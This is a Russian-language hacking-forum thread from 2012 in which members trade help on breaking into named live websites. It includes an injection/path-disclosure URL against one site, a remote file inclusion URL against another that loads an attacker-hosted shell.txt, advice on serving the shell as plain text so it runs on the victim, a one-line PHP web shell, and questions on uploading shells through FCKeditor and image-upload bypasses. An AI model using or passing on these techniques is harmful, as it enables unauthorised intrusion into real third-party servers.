Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Не напрягайся =) Там тупой ифрейм. Це не инклуд позор на мои седины. http://www.prodisney.ru/articles/news1012.php?nid='3455&cat=n&f=1 Вот раскрытие путей, как бонус )
     
    #21281 Cennarios, 24 Oct 2012
    Last edited: 24 Oct 2012
  2. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Как называется уязвимости такого рода?
    _http://lavart.su/examples'
     
  3. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    раскрытие путей=)
     
  4. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    239
    Likes Received:
    87
    Reputations:
    1
    Собственно возникло 2 вопроса:
    1) Имеется FCKeditor version 2.6.4.1 Build 23187, есть варианты залить shell?
    2) Есть форма для загрузки картинок php спокойно грузит, но вот проблема в том что при просмотре выдает:
    Code:
    яШяаJFIFяю>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality яЫC          $.' ",#(7),01444'9=82<.342яЫC     2!!22222222222222222222222222222222222222222222222222яАъҐ"яД   яДµ}!1AQa"q2Ѓ‘Ў#B±БRСр$3br‚ %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzѓ„…†‡€‰Љ’“”•–—™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪбвгдежзийкстуфхцчшщъяД
    Какие есть варианты это обойти уже и EXIF правил и перехватчиком правил((
     
  5. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    _ttp://forum.antichat.ru/thread314734.html
     
  6. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    Ребят подскажите в чём проблемма?
    Имеется RFI
    Code:
    http://www.basegroup.su/index.php?Page=
    
    но когда подставляю ссыль на свой шелл,то всё выводит,но выполняет на моём серваке,а не на сайте.
    Подскажите как решить проблемму?
     
  7. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    1) Твой сервер не должен поддерживать php (narod.ya.ru идеален)
    2) Шелл должен быть вида shell.txt
    Удачи
    P.S У меня все работает))!
     
  8. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    мля запарил,что серв не должен поддерживать php(
    да это знаю,просто запарил:)
     
    #21288 Faaax, 27 Oct 2012
    Last edited: 27 Oct 2012
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    Не совсем так. Правильнее будет сказать, что сервер должен отдавать php в формате plain-text. А использовать narod.ru или положить в корень своего сайта .htaccess - ваше дело.
    По сути подойдёт любой сторонний шелл и пара строчек в корне папки.

    Совсем не обязательно иметь дело с narod.ru

    Опять ошибочное суждение. Не важно расширение файла, так как при инклуде любой файл интерпретируется как PHP.

    Важно, лишь чтобы файл не интерпретировался на дочернем сайте. Но об этом я писал выше.
     
    _________________________
  10. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    хм всё равно не хочет
     
  11. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    ну у меня то работает
     
  12. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    не знаю чё такое у меня
    ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt
    просто пустая страница,а в исходнике код и всё
     
  13. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    PHP:
    eval($_REQUEST[c]);
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    такой вопросец, не очень знаком с файлами настройки хостинга, но можно както в etc/passwd или php.ini узнать путь к логам ошибок?
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Пути к логам ошибок задаются в настройках apache в файле httpd.conf

    распрастранненые пути файлов настроек сможешь посмотреть сдесь,
     
    _________________________
    #21295 winstrool, 28 Oct 2012
    Last edited: 28 Oct 2012
    1 person likes this.
  16. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    114
    Likes Received:
    27
    Reputations:
    26
    Кэп подсказывает, что это не инклуд, а file_get_contents()
     
  17. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    911
    Likes Received:
    469
    Reputations:
    723
    В php.ini есть параметр "error_log", он указывает на путь к логам ошибок интерпритации, но как максимум это только FPD.
     
    _________________________
  18. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    На хостингах обычно, что естественно, используются логически упорядоченные скелеты конфигураций хостов. Те , что-то вида: /serv/userXXX/conf/vhost.conf и подобное. Тупое спихивание конфигураций в httpd.conf или конфигов массово в папку а-ля sites-enabled способствует ухудшению удобства в настройке и использовании, а так-же не неверно сточки зрения изоляции уникального клиента. То-же касается и php.ini файла. Но это банальная схема для среднестатистического хостинга. Иные конфигурации используются в случаях если система не очень масштабна или следование логически верным построениям конфигурации системы не очень строги. Опять-же, излишняя унификация не столь необходима в случаях небольшого количества виртуальных хостов на сервере.
     
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,055
    Likes Received:
    615
    Reputations:
    690
    2Faaax залей на свой хост мини шелл и работай постом, все там робит.
     
    _________________________
  20. DasTem

    DasTem New Member

    Joined:
    6 Oct 2012
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    как использовать эту уязвимость?
    Nginx buffer underflow vulnerability
    Вот читал про нее:
    http://www.securelist.com/ru/advisories/36751
    Хелп, нашел в одной игре)
     
Loading...
Thread Status:
Not open for further replies.